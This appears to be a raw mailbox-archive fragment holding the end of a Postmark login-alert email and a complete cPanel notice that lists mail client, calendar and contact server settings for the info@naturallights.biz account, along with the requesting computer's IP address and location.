Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">If you didn=E2=80=99t initiate the login above, = please <a href=3D"https://account.postmarkapp.com/password_resets/new" styl= e=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; color: #007bc8= ; text-decoration: underline;">change your password</a> immediately and <a = href=3D"https://postmarkapp.com/support/article/1081-how-do-i-use-two-facto= r-authentication-2fa" style=3D"font-family: Helvetica Neue,Helvetica,Arial,= sans-serif; color: #007bc8; text-decoration: underline;">turn on two-factor= authentication</a> on your account.</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;"><a class=3D"btn" href=3D"https://account.postmar= kapp.com/password_resets/new" style=3D"font-family: Helvetica Neue,Helvetic= a,Arial,sans-serif; color: #fff; text-decoration: none; background-color: #= 007bc8; font-size: 14px; display: inline-block; height: auto; border-radius= : 3px; font-weight: 700; text-align: center; -webkit-text-size-adjust: none= ; border-color: #007bc8; border-style: solid; border-width: 10px 18px;">Cha= nge your password</a></p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">If you need any help, just reply to this email.<= /p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;"> Thanks, <br>The Postmark Team <br><a href=3D"mailto:support@postmarkapp.com" style=3D"font-family: He= lvetica Neue,Helvetica,Arial,sans-serif; color: #007bc8; text-decoration: u= nderline;">support@postmarkapp.com</a> </p> </td> </tr> <tr> <td class=3D"follow-banner" style=3D"font-family: Helvetica Neue,Helvetic= a,Arial,sans-serif; background-color: #ffde00; padding: 15px 50px;"> <table class=3D"follow-banner_links" width=3D"100%" cellpadding=3D"0" c= ellspacing=3D"0" align=3D"right" valign=3D"middle" style=3D"border-collapse= : collapse; mso-table-lspace: 0; mso-table-rspace: 0; font-size: 14px; text= -align: center;"> <tr> <td class=3D"align-center" style=3D"font-family: Helvetica Neue,Hel= vetica,Arial,sans-serif; text-align: center;"> <span>Follow us on</span> <img src=3D"https://newsletter.postmark= app.com/assets/images/twitter-dark@2x.png" alt=3D"Twitter Logo" width=3D"18= " height=3D"15" style=3D"margin-bottom: -3px;"> <a href=3D"https://twitter.= com/postmarkapp" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-= serif; color: #272727; text-decoration: underline;">Twitter</a> and <img sr= c=3D"https://newsletter.postmarkapp.com/assets/images/linkedin-dark@2x.png"= alt=3D"LinekdIn Logo" width=3D"15" height=3D"15" style=3D"margin-bottom: -= 3px;"> <a href=3D"https://www.linkedin.com/company/postmarkapp" style=3D"fo= nt-family: Helvetica Neue,Helvetica,Arial,sans-serif; color: #272727; text-= decoration: underline;">LinkedIn</a> </td> </tr> </table> </td> </tr> <tr> <td class=3D"footer" style=3D"font-family: Helvetica Neue,Helvetica,Arial= ,sans-serif; font-size: 14px; background-color: #3b4049; color: #fff; paddi= ng: 0 50px;"> <p style=3D"color: #FFF; text-align: center; font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; line-height: 22px; font-size: 14px; margin: 1= 2px 0;">=F0=9F=92=8C <a href=3D"https://postmarkapp.com/newsletter" style=3D"color: rgba(2= 55, 255,255, .5); font-family: Helvetica Neue,Helvetica,Arial,sans-serif; t= ext-decoration: underline;">Subscribe to the Postmark newsletter</a> </p> </td> </tr> </table> </td> </tr> <tr> <td class=3D"footer footer--slim" style=3D"font-family: Helve= tica Neue,Helvetica,Arial,sans-serif; font-size: 14px; background-color: #e= eece4; color: #fff; border-top-width: 0; padding: 16px 50px;"> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,san= s-serif; line-height: 22px; text-align: center; font-size: 14px; color: #b0= aea7; margin: 0;"><a href=3D"https://www.activecampaign.com/?utm_source=3Dp= ostmark&utm_medium=3Demail" target=3D"_blank" style=3D"font-family: Hel= vetica Neue,Helvetica,Arial,sans-serif; color: #b0aea7; text-decoration: un= derline;">ActiveCampaign</a> LLC, 1 North Dearborn St, 5th Floor, Chicago, = IL 60602</p> </td> </tr> </table> </td> </tr> </table> </body> </html> --mk3-d0acfd60b4bb440d84b8716f9d75d707-- PK ���Y���8 �8 A 1726668496.M59444P3239897.mgh-web11.maghost.ro,S=80114,W=81484:2,nu ��٘� Return-Path: <cpanel@naturallights.biz> Delivered-To: info@naturallights.biz Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id 5bbaAtDe6mbZbzEAJwI5NA (envelope-from <cpanel@naturallights.biz>) for <info@naturallights.biz>; Wed, 18 Sep 2024 17:08:16 +0300 Return-path: <cpanel@naturallights.biz> Envelope-to: info@naturallights.biz Delivery-date: Wed, 18 Sep 2024 17:08:16 +0300 Received: from [127.0.0.1] (port=55428 helo=localhost.localdomain) by mgh-web11.maghost.ro with esmtpa (Exim 4.97.1) (envelope-from <cpanel@naturallights.biz>) id 1sqvLt-0000000Daq7-0KKk for info@naturallights.biz; Wed, 18 Sep 2024 17:08:15 +0300 Date: Wed, 18 Sep 2024 14:08:15 GMT From: "cPanel on naturallights.biz" <cpanel@naturallights.biz> Message-Id: <1726668495.QaTZlI3fV6yKwnd_@mgh-web11.maghost.ro> Reply-To: "cPanel on naturallights.biz" <cpanel@naturallights.biz> Subject: =?UTF-8?B?W25hdHVyYWxsaWdodHMuYml6XSBDbGllbnQgY29uZmlndXJhdGlv?= =?UTF-8?B?biBzZXR0aW5ncyBmb3Ig4oCcaW5mb0BuYXR1cmFsbGlnaHRzLmJpeuKAnS4=?= To: <info@naturallights.biz> X-iContact_locale: en Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="mixed-Cpanel::Email::Object-3239878-1726668495-0.249595216632738" --mixed-Cpanel::Email::Object-3239878-1726668495-0.249595216632738 Content-Type: multipart/alternative; boundary="alternative-Cpanel::Email::Object-3239878-1726668495-0.53728288774365" --alternative-Cpanel::Email::Object-3239878-1726668495-0.53728288774365 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Client Configuration settings for =E2=80=9Cinfo@naturallights.biz=E2=80=9D. Mail Client Manual Settings --------------------------- Secure SSL/TLS Settings (Recommended) Username: info@naturallights.biz Password: Use the email account=E2=80=99s password. Incoming Server: mgh-web11.maghost.ro * IMAP Port: 993 * POP3 Port: 995 Outgoing Server: mgh-web11.maghost.ro * SMTP Port: 465 IMAP, POP3, and SMTP require authentication. Non-SSL Settings (NOT Recommended) Username: info@naturallights.biz Password: Use the email account=E2=80=99s password. Incoming Server: mail.naturallights.biz * IMAP Port: 143 * POP3 Port: 110 Outgoing Server: mail.naturallights.biz * SMTP Port: 587 IMAP, POP3, and SMTP require authentication. Calendar & Contacts Manual Settings ----------------------------------- Secure SSL/TLS Settings (Recommended). Username: info@naturallights.biz Password: Use the email account=E2=80=99s password. Server: https://mgh-web11.maghost.ro:2080 * Port: 2080 Full Calendar URL(s): * cPanel CalDAV Calendar: * https://mgh-web11.maghost.ro:2080/calendars/info@naturallights.biz/cale= ndar Full Contact List URL(s): * cPanel CardDAV Address Book: * https://mgh-web11.maghost.ro:2080/addressbooks/info@naturallights.biz/a= ddressbook Non-SSL Settings (NOT Recommended). Username: info@naturallights.biz Password: Use the email account=E2=80=99s password. Server: http://mail.naturallights.biz:2079 * Port: 2079 Full Calendar URL(s): * cPanel CalDAV Calendar: * http://mail.naturallights.biz:2079/calendars/info@naturallights.biz/cal= endar Full Contact List URL(s): * cPanel CardDAV Address Book: * http://mail.naturallights.biz:2079/addressbooks/info@naturallights.biz/= addressbook A .mobileconfig file for use with iOS for iPhone/iPad/iPod and MacOS=C2=AE = Mail.app=C2=AE for Mountain Lion (10.8+) is attached to this message. This notice is the result of a request made by a computer with the IP addre= ss of =E2=80=9C60.254.105.13=E2=80=9D through the =E2=80=9Ccpanel=E2=80=9D = service on the server. The remote computer=E2=80=99s location appears to be: India (IN). The remote computer=E2=80=99s IP address is assigned to the provider: =E2= =80=9CHATHWAY CABLE AND DATACOM LIMITED Hathway IP over Cable Internet Acce= ss=E2=80=9D The provider supplied the following remarks about the IP address allocation= : =E2=80=9C-------------------------------------------------------- To repo= rt network abuse, please contact mnt-irt For troubleshooting, please contac= t tech-c and admin-c Report invalid contact via www.apnic.net/invalidcontac= t --------------------------------------------------------=E2=80=9D The remote computer=E2=80=99s network link type appears to be: =E2=80=9CDSL= =E2=80=9D. The remote computer=E2=80=99s operating system appears to be: =E2=80=9CMac = OS X=E2=80=9D. The system generated this notice on Wednesday, September 18, 2024 at 2:08:1= 5 PM UTC. Do not reply to this automated message. cP Copyright=C2=A9 2024 cPanel, L.L.C.= --alternative-Cpanel::Email::Object-3239878-1726668495-0.53728288774365 Content-Type: multipart/related; boundary="related-Cpanel::Email::Object-3239878-1726668495-0.704441909327247" --related-Cpanel::Email::Object-3239878-1726668495-0.704441909327247 Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: quoted-printable <body style=3D"background:#F4F4F4"> <div style=3D"margin:0;padding:0;background:#F4F4F4"> <table cellpadding=3D"10" cellspacing=3D"0" border=3D"0" width=3D"1= 00%" style=3D"width:0 auto;"> <tbody> <tr> <td align=3D"center"> <table cellpadding=3D"0" cellspacing=3D"0" border= =3D"0" width=3D"680" style=3D"border:0;width:0 auto;max-width:680px;"> <tbody> <tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20 <td width=3D"680" height=3D"25" style= =3D"font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;font-size:16px;= color:#333333"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 Client Configuration settings f= or =E2=80=9Cinfo@naturallights.biz=E2=80=9D. =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 </td> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20 </tr> <tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20 <td style=3D"padding: 15px 0 20px 0; ba= ckground-color: #FFFFFF; border: 2px solid #E8E8E8; border-bottom: 2px soli= d #FF6C2C;"> <table width=3D"680" border=3D"0" c= ellpadding=3D"0" cellspacing=3D"0" style=3D"background:#FFFFFF;font-family:= 'Helvetica Neue',Helvetica,Arial,sans-serif;"> <tbody> <tr> <td width=3D"15"> </td> <td width=3D"650"> <table cellpadding= =3D"0" cellspacing=3D"0" border=3D"0" width=3D"100%"> <tbody> <tr> <td> <di= v id=3D"manual_settings_area" class=3D"section"> <h2 id=3D"hdrManualSettings">Mail Client Manual Settings</h2> =20=20=20=20=20=20=20=20 <div class=3D"row"> <div class=3D"col-md-6"> <div id=3D"ssl_settings_area" =20=20=20=20=20=20=20=20=20=20=20=20 style=3D"background-color: #fff; border: 1px solid transparent= ; border-radius: 4px; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05); margin-bot= tom: 20px; border-color: #428bca;" =20=20=20=20=20=20=20=20=20=20=20=20 class=3D"preferred-selection panel panel-primary"> <div =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 style=3D"border-top-left-radius: 3px; border-top-right-radi= us: 3px; padding: 10px 15px; background-color: #428bca; border-color: #428b= ca; color: #fff;" =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 class=3D"panel-heading"> Secure <abbr title=3D"Secure Sockets Layer">SSL</abbr>/<abb= r title=3D"Transport Layer Security">TLS</abbr> Settings (Recommended) </div> <table class=3D"table manual_settings_table" style=3D"border-= collapse: collapse; border-spacing: 0; margin-bottom: 0; width: 100%; backg= round-color: transparent; max-width: 100%;"> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblSSLSettingsAreaUsername">Username:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valSSLSettingsAreaUsername" class=3D"data wrap-text">info@naturall= ights.biz</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblSettingsAreaPassword">Password:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valSettingsAreaPassword" class=3D"escape-note"> Use the email acco= unt=E2=80=99s password.</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblSettingsAreaIncomingServer">Incoming Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valSettingsAreaIncomingServer" class=3D"data">mgh-web11.maghost.ro <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Internet Message Access Proto= col" class=3D"initialism">IMAP</abbr> Port: 993</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Post Office Protocol 3" class= =3D"initialism">POP3</abbr> Port: 995</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblSettingsAreaOutgoingServer">Outgoing Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valSettingsAreaOutGoingServer" class=3D"data">mgh-web11.maghost.ro <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Simple Mail Transfer Protocol= ">SMTP</abbr> Port: 465</li> </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" colspan=3D"2" class=3D"notes"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20 = <div id=3D"lblSettingsAreaSmallNote1" class=3D"small_note">IMAP, POP3,= and SMTP require authentication.</div> </td> </tr> </table> </div> </div> =20=20 </div> =20=20=20=20=20=20=20=20 <div class=3D"row" id=3D"nonSSL" style=3D"display: none"> <div class=3D"col-md-6"> <div id=3D"non_ssl_settings_area" =20=20=20=20=20=20=20=20=20=20=20=20 style=3D"background-color: #fff; border: 1px solid transparent= ; border-radius: 4px; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05); margin-bot= tom: 20px; border-color: #f6c342;" =20=20=20=20=20=20=20=20=20=20=20=20 class=3D"panel panel-default panel-warning"> <div =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 style=3D"border-top-left-radius: 3px; border-top-right-radi= us: 3px; padding: 10px 15px; background-color: #fcf8e1; border-color: #f6c3= 42; color: #333;" =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 class=3D"panel-heading"> <span id=3D"descNonSSLSettings" class=3D"caption not-recomm= ended">Non-SSL Settings (NOT Recommended)</span> </div> <table id=3D"tblManualSettingsTable" class=3D"table manual_se= ttings_table" style=3D"border-collapse: collapse; border-spacing: 0; margin= -bottom: 0; width: 100%; background-color: transparent; max-width: 100%;"> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblNonSSLSettingsUsername">Username:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valNonSSLSettingsUsername" class=3D"data wrap-text">info@naturalli= ghts.biz</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblNonSSLSettingsPassword">Password:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valNonSSLSettingsPassword" class=3D"escape-note">Use the email acc= ount=E2=80=99s password.</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblNonSSLSettingsIncomingServer">Incoming Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valNonSSLSettingsIncomingServer" class=3D"data">mail.naturallights= .biz <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Internet Message Access Proto= col" class=3D"initialism">IMAP</abbr> Port: 143</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Post Office Protocol 3" class= =3D"initialism">POP3</abbr> Port: 110</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"NonSSLSettingsOutgoingServer">Outgoing Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"NonSSLSettingsOutgoingServerData" class=3D"data">mail.naturallight= s.biz <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Simple Mail Transfer Protocol= ">SMTP</abbr> Port: 587</li> </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" colspan=3D"2" class=3D"notes"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20 = <div id=3D"descNonSSLSettingsAuthenticationIsRequiredForIMAPPOP3SMTP1"= class=3D"small_note">IMAP, POP3, and SMTP require authentication.</div> </td> </tr> </table> </div> </div> </div> </div><div class=3D"section"> <h2>Calendar & Contacts Manual Settings</h2> <div class=3D"row"> =20=20=20=20=20=20=20=20=20 <div class=3D"col-md-6"> <div style=3D"background-color: #fff; border: 1px solid transpar= ent; border-radius: 4px; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05); margin-= bottom: 20px; border-color: #428bca;" class=3D"preferred-selection panel pa= nel-primary"> <div style=3D"border-top-left-radius: 3px; border-top-right-= radius: 3px; padding: 10px 15px; background-color: #428bca; border-color: #= 428bca; color: #fff;" class=3D"panel-heading"> Secure <abbr title=3D"Secure Sockets Layer">SSL</abbr>/<abb= r title=3D"Transport Layer Security">TLS</abbr> Settings (Recommended). </div> <table class=3D"table manual_settings_table" style=3D"border-= collapse: collapse; border-spacing: 0; margin-bottom: 0; width: 100%; backg= round-color: transparent; max-width: 100%;"> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Username:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data wrap-text">info@naturallights.biz</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Password:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"escape-note"> Use the email account=E2=80=99s password.</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data">https://mgh-web11.maghost.ro:2080 <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">Port: 2080</li> </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Full Calendar URL(s):</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data"> <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><b>cPanel CalDAV Calendar</b>:</li> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">https://mgh-web11.maghost.ro:2080/calendars/= info@naturallights.biz/calendar</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Full Contact List URL(s):</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data"> <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><b>cPanel CardDAV Address Book</b>:</li> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">https://mgh-web11.maghost.ro:2080/addressboo= ks/info@naturallights.biz/addressbook</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 </table> </div> </div> =20=20=20=20=20=20=20=20=20 <div class=3D"col-md-6"> <div style=3D"background-color: #fff; border: 1px solid transpar= ent; border-radius: 4px; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05); margin-= bottom: 20px; border-color: #f6c342;" class=3D"preferred-selection panel pa= nel-primary"> <div style=3D"border-top-left-radius: 3px; border-top-right-= radius: 3px; padding: 10px 15px; background-color: #fcf8e1; border-color: #= f6c342; color: #333;" class=3D"panel-heading"> Non-SSL Settings (NOT Recommended). </div> <table class=3D"table manual_settings_table" style=3D"border-= collapse: collapse; border-spacing: 0; margin-bottom: 0; width: 100%; backg= round-color: transparent; max-width: 100%;"> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Username:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data wrap-text">info@naturallights.biz</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Password:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"escape-note"> Use the email account=E2=80=99s password.</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data">http://mail.naturallights.biz:2079 <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">Port: 2079</li> </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Full Calendar URL(s):</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data"> <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><b>cPanel CalDAV Calendar</b>:</li> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">http://mail.naturallights.biz:2079/calendars= /info@naturallights.biz/calendar</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Full Contact List URL(s):</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data"> <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><b>cPanel CardDAV Address Book</b>:</li> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">http://mail.naturallights.biz:2079/addressbo= oks/info@naturallights.biz/addressbook</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 </table> </div> </div> =20=20=20=20=20=20=20=20=20 </div> </div> </div><p> A .mobileconfig file for use with iOS for iPhone/iPad/iPod and MacOS=C2=AE= Mail.app=C2=AE for Mountain Lion (10.8+) is attached to this message. </p> </td> </tr> <tr> <td> <di= v style=3D"font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;border-t= op: 2px solid #E8E8E8; padding-top:5px; margin-top: 5px; font-size:12px; co= lor: #666666;"> <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> =20=20=20=20=20=20=20=20 This notice is the result of a request made by a computer with th= e <abbr title=3D"Internet Protocol">IP</abbr> address of =E2=80=9C60.254.10= 5.13=E2=80=9D through the =E2=80=9Ccpanel=E2=80=9D service on the server. =20=20=20=20=20=20=20=20 </p> <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> The remote computer=E2=80=99s location appears = to be: India (IN). </p> =20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20=20=20=20 <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> The remote computer=E2=80=99s <abbr title=3D"Internet Pro= tocol">IP</abbr> address is assigned to the provider: =E2=80=9CHATHWAY CABL= E AND DATACOM LIMITED Hathway IP over Cable Internet Access=E2=80=9D </p> =20=20=20=20=20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20=20=20=20 <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> The provider supplied the following remarks about the <ab= br title=3D"Internet Protocol">IP</abbr> address allocation: =E2=80=9C-----= --------------------------------------------------- To report network abuse= , please contact mnt-irt For troubleshooting, please contact tech-c and adm= in-c Report invalid contact via www.apnic.net/invalidcontact --------------= ------------------------------------------=E2=80=9D </p> =20=20=20=20=20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20 <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;= "> The remote computer=E2=80=99s network link type appears to be: = =E2=80=9CDSL=E2=80=9D. </p> <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> =20=20=20=20=20=20=20=20=20=20 The remote computer=E2=80=99s operating system appears to be: = =E2=80=9CMac OS X=E2=80=9D. =20=20=20=20=20=20=20=20=20=20 </p> =20=20=20=20=20=20=20=20=20=20 <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> The system generated this notice on Wednesday, September 18, 2024 a= t 2:08:15 PM UTC. </p> </div>=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 = <!-- --> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <p> Do not reply to this automated message. </p> </td> </tr> </tbody> </table> </td> <td width=3D"15"> </td> </tr> </tbody> </table> </td> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20 </tr> <tr> <td align=3D"center" style=3D"padding-t= op: 10px;"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20 